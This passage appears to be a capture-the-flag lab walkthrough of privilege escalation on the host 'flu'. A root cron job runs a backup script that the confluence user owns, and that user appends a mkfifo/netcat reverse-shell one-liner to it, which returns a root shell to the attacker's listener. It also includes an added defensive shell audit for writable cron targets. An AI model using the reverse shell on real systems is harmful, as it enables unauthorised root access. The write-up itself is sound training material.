Overwriting Cronjob File
The root cron job runs the Bash script log-backup.sh, which archives the Confluence log directory to /root/backup with a timestamp and deletes old backups. The script was identified by PSPY and PEAS, which confirmed both its location and that it is being executed. Notably, log-backup.sh is owned by the confluence user, so that user can modify it. Because the script runs with root privileges, this ownership is a privilege escalation opportunity.
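The weakness above is a root cron job whose target script can be rewritten by an unprivileged account. The audit helper below is an added example, not part of the original writeup and not taken from the target host: it walks the usual crontab locations, pulls every absolute path each job references, and reports targets that are not root-owned or are group/world-writable. It assumes Linux with GNU stat; the cron paths it sweeps are the standard ones, not values from this page.

```shell
#!/bin/sh
# Added defender-side check, not part of the original writeup: flag cron
# targets that a non-root account could rewrite (the flaw abused above).
# Assumes Linux with GNU stat; the cron paths below are generic defaults.

# check_cron_target PATH [EXPECTED_UID]
# Prints a WEAK line and returns 1 when PATH is a regular file whose owner
# is not EXPECTED_UID (root by default) or that is group/world writable.
# Missing paths and non-files return 0: they are not this check's concern.
check_cron_target() {
    path="$1"; expected_uid="${2:-0}"; reason=""
    [ -f "$path" ] || return 0
    uid=$(stat -c '%u' "$path" 2>/dev/null) || return 0
    mode=$(stat -c '%A' "$path")                 # e.g. -rwxrwxrwx
    [ "$uid" = "$expected_uid" ] || reason="owner uid $uid, expected $expected_uid"
    case "$mode" in ?????w*)    reason="${reason:+$reason; }group-writable" ;; esac
    case "$mode" in ????????w*) reason="${reason:+$reason; }world-writable" ;; esac
    [ -n "$reason" ] || return 0
    printf 'WEAK %s (%s): %s\n' "$path" "$mode" "$reason"
    return 1
}

# audit_cron_file CRONFILE [EXPECTED_UID]
# Pulls every absolute path out of the non-comment lines of a crontab
# (system format with a user column or per-user format, either works)
# and runs check_cron_target on each. Findings go to stdout, one per line.
audit_cron_file() {
    grep -v '^[[:space:]]*#' "$1" | grep -o '/[^[:space:];|&>:]*' | sort -u |
    while read -r target; do
        check_cron_target "$target" "${2:-0}" || :
    done
}

# Stand-alone use: sweep the usual cron locations on this host.
for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
    if [ -f "$f" ] && [ -r "$f" ]; then
        audit_cron_file "$f"
    fi
done
```

Run it as root to read per-user crontabs; a clean sweep prints nothing.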
confluence@flu:/opt$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f' >> /opt/log-backup.sh
Appending a reverse shell command to the /opt/log-backup.sh file
confluence@flu:/opt$ cat log-backup.sh
#!/bin/bash
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*" -mmin +5 -exec rm -rf {} \;
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f
Updated /opt/log-backup.sh file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.41] 39444
bash: cannot set terminal process group (25439): Inappropriate ioctl for device
bash: no job control in this shell
root@flu:~# whoami
whoami
root
root@flu:~# hostname
hostname
flu
root@flu:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:08:79 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.144.41/24 brd 192.168.144.255 scope global ens160
valid_lft forever preferred_lft forever
System level compromise